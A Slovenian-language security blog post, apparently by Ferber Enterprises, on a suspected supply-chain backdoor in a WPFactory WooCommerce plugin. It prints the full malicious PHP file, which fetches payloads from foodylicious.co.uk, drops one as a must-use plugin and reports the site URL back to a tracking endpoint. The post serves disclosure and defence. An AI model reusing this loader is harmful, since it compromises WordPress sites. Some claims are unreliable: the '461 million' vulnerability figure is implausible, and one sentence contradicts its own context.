Varnostna luknja na spletnem mestu WPFactory: ogroženih je 170.000 spletnih strani WordPress

| Novice |

WordPress ostaja najbolj razširjen sistem za upravljanje vsebin na svetu, saj poganja več kot 40 odstotkov vseh spletnih strani na internetu. Od spletnih strani malih podjetij in osebnih blogov do velikih podjetniških platform in infrastrukture e-trgovine, CMS je postal hrbtenica sodobnega spleta. Njegova priljubljenost izhaja iz njegove prilagodljivosti, odprtega ekosistema in ogromnega števila vtičnikov, ki so na voljo za razširitev njegove funkcionalnosti.

Vendar je ta isti ekosistem postal tudi eden največjih varnostnih izzivov za WordPress.

V podjetju Ferber Enterprises naša ekipa za kibernetsko varnost nenehno spremlja grožnje, ki vplivajo na ekosistem WordPressa, saj se ranljivosti v vtičnikih, predlogah ali dobavnih verigah lahko hitro razvijejo v obsežne varnostne kršitve, ki prizadenejo tisoče spletnih strani po vsem svetu. V zadnjih letih napadalci vse pogosteje ciljajo na razvijalce vtičnikov in distribucijsko infrastrukturo namesto na posamezne spletne strani, kar omogoča širjenje zlonamerne kode prek zaupanja vrednih posodobitev programske opreme in uradnih kanalov za prenos.

Ta teden je izbruhnila velika polemika v zvezi s podjetjem WPFactory, znanim razvijalcem vtičnikov za WordPress, katerega izdelki so nameščeni na več kot 170.000 spletnih straneh po vsem svetu. Več kot 80 vtičnikov, povezanih s tem podjetjem, je bilo začasno umaknjenih s spletne strani WordPress.org, potem ko je naša ekipa za kibernetsko varnost pri WPFactory odkrila sumljivo zadnja vrata v premium različici enega od njihovih vtičnikov.

Incident je sprožil resne pomisleke v skupnosti WordPress glede varnosti dobavne verige programske opreme, procesov pregledovanja vtičnikov in vse večje prefinjenosti napadov na ekosistem odprtokodnih rešitev.

Odkritje sumljivega vedenja vtičnika

Ta težava se je prvič pojavila, ko je naša ekipa za kibernetsko varnost pri Ferber Enterprises med testiranjem premium različice vtičnika »EU VAT for WooCommerce Pro«, ki se distribuira neposredno z njihove uradne spletne strani, opazila nenavadno delovanje.

Sprva se je preiskava začela po tem, ko je vtičnik med namestitvijo povzročil kritično napako. Med odpravljanjem težave so naši analitiki identificirali sumotivo datoteko PHP z imenom class-alg-wc-eu-vat-customer.php. Zdelo se je, da datoteka izvaja vedenje, ki je popolnoma v neskladju s pričakovano funkcionalnostjo vtičnika WooCommerce VAT.

class-alg-wc-eu-vat-customer.php 
<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Po naši analizi je koda poskušala:

  • Prenesite zunanjo ZIP datoteko z oddaljenega strežnika
  • Spremeni imenike jedra WordPressa
  • Komunicirajte z zunanjo infrastrukturo
  • Potencialno izvajanje oddaljenih plačilnih kod na prizadetih spletnih mestih

Ti kazalniki so takoj nakazali na možno prisotnost skrite zadnje strani ali zlonamerne ogroženosti dobavne verige.

Kar je situacijo naredilo še posebej zaskrbljujočo, je bilo dejstvo, da vtičnik ni bil pridobljen iz neuradnega ogledala ali piratskega repozitorija. Paket je bil prenesen neposredno z uradnega portala za stranke podjetja WPFactory, kar je še okrepilo sum, da je bil morda ogrožen sam distribucijski kanal.

V podjetju Ferber Enterprises smo incident takoj dokumentirali in začeli postopek odgovornega obveščanja, tako da smo se prek GitHuba neposredno obrnili na podjetje WPFactory.

Prvi odziv s strani WPFactory

Podjetje WPFactory je sprva odgovorilo, da sumljiva datoteka in vedenje, opisana v poročilu, nista del njihove uradne kodne baze.

Predstavnik podjetja je predlagal več alternativnih razlag, vključno z:

  • Modificirana lokalna namestitev
  • Ogroženo spletno okolje
  • Zastarela različica vtičnika
  • Potencialno prirejen vir prenosa

Družba je prav tako navedla, da zaradi varnostnih razlogov ni mogla pregledati priložene ZIP datoteke, ker je njihov brskalnik arhiv označil kot potencialno nevaren.

Naša ekipa za kibernetsko varnost je nato pojasnila, da je bil vtičnik prenesen neposredno z uradne spletne strani WPFactory in da je sumljiva datoteka ostala prisotna tudi po prenosu nove kopije različice 4.6.1 iz istega vira.

Ta podrobnost je postala osrednja točka preiskave. Če je več neodvisnih prenosov iz uradnega distribucijskega kanala dosledno vsebovalo isto sumljivo kodo, je možnost vdora v lokalno spletno stran postajala vse manj verjetna. Kljub tem ugotovitvam je podjetje WPFactory sprva navedlo, da težave na svoji strani ni uspelo ponoviti, in trdilo, da sumljiva datoteka v uradnem paketu vtičnikov ne obstaja.

Podjetje je nato zaprosilo za skrbniški in FTP-dostop do prizadetega okolja, da bi lahko nadaljevalo preiskavo. V podjetju Ferber Enterprises smo to prošnjo zavrnili zaradi varnostnih razlogov. Omogočanje privilegiranega dostopa do strežnika dobavitelju, katerega infrastruktura je morda sama ogrožena, bi pomenilo nesprejemljivo varnostno tveganje. Naša ekipa je namesto tega nadaljevala z zagotavljanjem tehničnih dokazov, vključno z videoposnetkom, ki prikazuje sumljivo delovanje vtičnika takoj po namestitvi.

Stopnjevanje na WordPress.org

S potekom preiskave so se povečale skrbi glede morebitnega obsega problema. Podjetje WPFactory ponuja obsežen nabor vtičnikov, ki obsega več kot 65 vtičnikov s skupno več kot 170.000 aktivnimi namestitvami. Vsak vdor v distribucijsko infrastrukturo podjetja bi zato lahko imel daljnosežne posledice za celoten ekosistem WordPressa.

Naša ekipa je zadevo posredovala neposredno na WordPress.org, da bi preprečila, da bi med potekom preiskave še več uporabnikov namestilo potencialno ogrožene pakete. WordPress.org je nato sprejel izredni ukrep in začasno umaknil več kot 80 vtičnikov WPFactory iz uradnega repozitorija.

Ta poteza je takoj pritegnila pozornost celotne varnostne skupnosti WordPressa, saj so množična zaprtja vtičnikov takšnega obsega razmeroma redka in ponavadi kažejo na resne nerešene težave. Po eskalaciji je podjetje WPFactory kasneje priznalo, da se je težava izkazala za utemeljeno, in se opravičilo, da ni hitreje ukrepalo ob prvem poročilu. Predstavniki podjetja so izjavili, da zadevo aktivno preiskujejo in si prizadevajo za rešitev. Ena od hipotez, ki jo je notranje postavilo podjetje WPFactory, je nakazovala, da je bil morda prek njihove infrastrukture nenamerno posredovan zastarel ali v predpomnilniku shranjen paket vtičnikov.

Vendar se je naša ekipa za kibernetsko varnost s to oceno strinjala. Opazovano vedenje je močno nakazovalo na globljo varnostno težavo, ki bi lahko vključevala ogrožene gradbene cevovode, distribucijske sisteme ali nepooblaščeno vnašanje kode v arhive prenosnih vtičnikov.

Zakaj je ta incident pomemben

Spor okoli WPFactory opozarja na vse večjo grožnjo za kibernetsko varnost, znano kot napad na dobavno verigo programske opreme. V preteklosti so se napadalci osredotočali na neposredno ogrožanje posameznih spletnih strani z napadi po metodi brute force ali z izkoriščanjem ranljivosti vtičnikov. Danes pa se napadalci vse pogosteje osredotočajo na same ponudnike programske opreme, saj ogrožanje zaupanja vrednega dobavitelja omogoča, da se zlonameren kod razširi na tisoče spletnih strani hkrati.

To strategijo smo že opazili v več odmevnih kibernetskih incidentih, ki so v zadnjem desetletju prizadeli globalne programske ekosisteme. Konkretno v ekosistemu WordPress predstavljajo razvijalci vtičnikov privlačne tarče, ker skrbniki vtičnikom po naravi zaupajo in ti pogosto delujejo z zvišanimi dovoljenji.

Če se zlonameren kod vključi v paket vtičnika, ki se distribuira prek uradnega kanala, lahko prizadete spletne strani nevede same namestijo zlonamerno programsko opremo. V primeru sumljivega vtičnika WPFactory so možne posledice resne.

Na podlagi naše analize bi identificirano vedenje teoretično omogočilo napadalcem, da:

  • Namesti dodatno zlonamerno programsko opremo
  • Vstavite SEO spam
  • Ustvarite trajne zlonamerne programe
  • Prenesti občutljive podatke
  • Oddaljeno upravljanje namestitev WordPressa
  • Vzdrževati nepooblaščen dostop dalj časa

Nevarnost takšnih napadov tiči v njihovi prikritosti. Sodobna zaledna vrata (backdoors) so pogosto zasnovana tako, da mirujejo mesece, preden se aktivirajo, kar znatno otežuje njihovo odkrivanje. V začetku tega meseca je bila skupina WordPress Plugins Team poročala, da je zaprla več kot 30 vtičnikov, potem ko je skrita zlonamerna koda, vdelana v drug portfelj vtičnikov, ostala neaktivna približno osem mesecev, preden se je končno aktivirala in na spletna mesta vbrizgala SEO spam.

Ta trend ponazarja, kako napadalci vse bolj dajejo prednost vztrajnosti in zakasnjeni aktivaciji, da bi se izognili mehanizmom zaznavanja.

Širša varnostna kriza v ekosistemu WordPress

Incident WPFactory razkriva tudi širše sistemske varnostne izzive, ki vplivajo na WordPress kot celoto. Ekosistem vtičnikov se je v zadnjem desetletju močno razširil, saj je na uradnih in komercialnih tržnicah na voljo več deset tisoč vtičnikov. Čeprav ta ekosistem spodbuja inovativnost in prilagodljivost, hkrati povzroča tudi izjemno zapletenost pri nadzoru varnosti.

Glede na poročilo podjetja Patchstack z naslovom “Stanje varnosti WordPressa v letu 2026” skoraj 461 milijonov znanih ranljivosti ni bilo odpravljenih pred javnim razkritjem. Ta statistika odraža vse večjo obremenitev, s katero se soočajo razvijalci vtičnikov, raziskovalci na področju varnosti in skrbniki repozitorijev.

Hkrati pa naj bi uradna vrsta WordPress vtičnikov za pregled zdaj presegala 4.000 vtičnikov, ki čakajo na pregled. Takšne številke ponazarjajo ogromen izziv zagotavljanja kakovosti in revizije varnosti v obsegu.

Mnogi razvijalci vtičnikov so majhne ekipe z omejenimi varnostnimi viri. Drugi pa hkrati upravljajo z več desetimi vtičniki, pri čemer izvajajo agresivne strategije poslovne rasti, ki vključujejo prevzeme in širitev portfelja. Tudi podjetje WPFactory se je nedavno razširilo s prevzemi, med katerimi je bil leta 2025 nakup podjetja Extend-WP in njegovih 19 vtičnikov, čemur je še istega leta sledil prevzem podjetja WBW in več dodatnih vtičnikov.

Hitro širjenje portfelja lahko ustvari operativno kompleksnost, ki zaplete revizijo kode, upravljanje infrastrukture in preverjanje celovitosti izdaje. Napadalci se teh resničnosti dobro zavedajo. Vedno bolj se osredotočajo na izkoriščanje šibkih praks operativne varnosti pri ponudnikih programske opreme, namesto da bi neposredno ciljali na končne uporabnike.

Naraščajoči pomen varnosti dobavne verige

Dogodki, kot je ta, krepijo nujno potrebo po strožjih praksah varnosti dobavne verige v celotnem ekosistemu WordPress.

V podjetju Ferber Enterprises naša ekipa za kibernetsko varnost odločno priporoča, da razvijalci vtičnikov uvedejo nekaj ključnih varnostnih ukrepov, med drugim:

  • Kriptografsko podpisovanje paketov
  • Varni CI/CD cevovodi
  • Obvezna večfaktorska avtentikacija
  • Segmentacija infrastrukture
  • Neprekinjeno spremljanje celovitosti
  • Neodvisne kode revizije
  • Ponovljivi gradbeni sistemi

Skrbniki spletnih strani bi morali okrepiti tudi lastno varnost. Tudi vtičnikov, prenesenih iz uradnih ali zaupanja vrednih virov, ne gre domnevati, da so nujno varni.

Organizacije, ki upravljajo kritično infrastrukturo WordPress, bi morale razmisliti o:

  • Vzdrževanje uprizoritvenih okolij
  • Nadzor izhodnega prometa
  • Skeniranje vtičnikov pred uvajanjem
  • Omejevanje uporabe vtičnikov
  • Uporaba nadzora dostopa z najmanjšimi pooblastili
  • Uvajanje spremljanja celovitosti datotek
  • Uporaba upravljanih požarnih zidov za spletne aplikacije (WAF)

V podjetniških okoljih postaja preverjanje dobavne verige enako pomembno kot tradicionalno obvladovanje ranljivosti. Predpostavka, da so uradni programski kanali vedno varni, v današnjem okolju groženj ni več realna.

Odzivi skupnosti in nadaljevanje preiskave

Spor se je hitro razširil po skupnosti WordPress, ko so razvijalci, varnostni raziskovalci in ponudniki infrastrukture javno začeli razpravljati o tej zadevi.

Več znanih osebnosti v ekosistemu je povečalo ozaveščenost o situaciji, vključno z razvijalci, ki so objavili sezname začasno zaprtih vtičnikov in skrbnike spodbudili k reviziji svojih okolij.

Medtem naša ekipa pri Ferber Enterprises nadaljuje z analizo sumljivih vzorcev vtičnikov in spremlja morebitne dodatne znake vdora, ki bi lahko ogrozili spletne strani WordPress po vsem svetu.

Ob objavi je podjetje WPFactory potrdilo obstoj težave in navedlo, da si aktivno prizadeva za njeno rešitev.

Vendar številna vprašanja ostajajo neodgovorjena:

  • Je bila uradna distribucijska infrastruktura ogrožena?
  • Kako dolgo so bili zlonamerni paketi potencialno distribuirani?
  • So bili prizadeti dodatni vtičniki?
  • Je bila vdrta uporabniška računa ali preneseni sistemi?
  • Ali so napadalci pridobili trajen dostop do interne infrastrukture?
  • Ali bi lahko obstajala dodatna nedejavna tovorna bremena?

Dokler ta vprašanja ne bodo v celoti rešena, previdnost ostaja ključnega pomena.

Prihodnost varnosti WordPressa

Incident WPFactory bi lahko na koncu postal še en značilen primer izzivov na področju kibernetske varnosti, s katerimi se sooča odprtokodni spletni ekosistem.

WordPress poganja ogromen del globalnega spletnega gospodarstva. Kakršno koli obsežno ogrožanje, ki bi prizadelo razvijalce vtičnikov, ima zato lahko posledice, ki segajo daleč za posamezna spletna mesta.

Ker se napadalci vse bolj usmerjajo v ogrožanje dobavne verige in tehnike prikritega trajnega prisotnosti, varnosti vtičnikov ni več mogoče obravnavati kot drugotno vprašanje. V podjetju Ferber Enterprises menimo, da je ta dogodek pomemben opomin, da kibernetska varnost ne zajema le zaščite samih spletnih strani, temveč tudi zaščito vseh ravni verige distribucije programske opreme.

Zaupanje v odprte ekosisteme je odvisno od preglednosti, hitrega odzivanja na incident in močnih praks operativne varnosti. Ekosistem WordPress je zdaj na pomembni točki.

Kako se bodo razvijalci, vzdrževalci repozitorijev, ponudniki gostovanja in varnostne ekipe odzvali na takšne incidente, bo pomagalo določiti, ali lahko WordPress še naprej ohrani zaupanje milijonov podjetij in organizacij, ki se vsak dan zanašajo nanj.